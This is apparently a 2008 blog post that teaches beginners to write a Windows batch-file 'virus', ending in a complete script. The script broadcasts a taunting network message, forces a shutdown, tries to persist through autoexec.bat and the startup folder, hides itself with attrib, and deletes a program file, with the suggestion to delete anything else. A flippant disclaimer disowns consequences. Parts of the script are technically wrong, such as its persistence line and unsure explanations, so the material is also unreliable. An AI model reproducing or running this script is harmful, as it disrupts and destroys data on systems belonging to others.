Thursday, April 17, 2008

VIRUS MAKING :LAMER

Dear lamer/other's in this article i will show you some DOS command's to make a basic virus.

DISCLAIMER

If you get in trouble doing this just blame me because i don't really care.


Ok here is the first thing we need to know is this.

Net Send * "Message"

this is for school/work place etc. NOTE: this will not work if your admin is smarter then me. it will have been disabled! Next thing we need to know is @echo off simply means I THINK display message. Ok next command shutdown.exe -s -t 10 -c "Message" this shuts down the computer and displays a message.

IMPORTANT PART


echo copy %0 >> c:\autoexec.bat

This saves the virus to autoexec so when window's boot's up so do's your virus!



IMPORTANT PART 2


Attrib +r +h C:\windows\startm~1\program\startup\h4x0r3d.bat

This hides the virus in start up as well it make's it hiden and read only!


ONLY IF YOU WANT

rem deleting ms paint
del C:\Progra~1\Accessories\MSPAINT.EXE
deletes MS paint you can make it delete what you want.


Code:


Net Send * "The server is h4x0r3d BY GBX-EMU-MAFIA HACK CREW/SMALL TIME MAFIA"
@echo off
shutdown.exe -s -t 10 -c "You have been h4x0r3d BY GBX-EMU-MAFIA HACK CREW/SMALL TIME MAFIA!"
echo copy %0 >> c:\autoexec.bat
Attrib +r +h C:\windows\startm~1\program\startup\h4x0r3d.bat
@echo off
rem deleting ms paint
del C:\Progra~1\Accessories\MSPAINT.EXE

No comments:

Post a Comment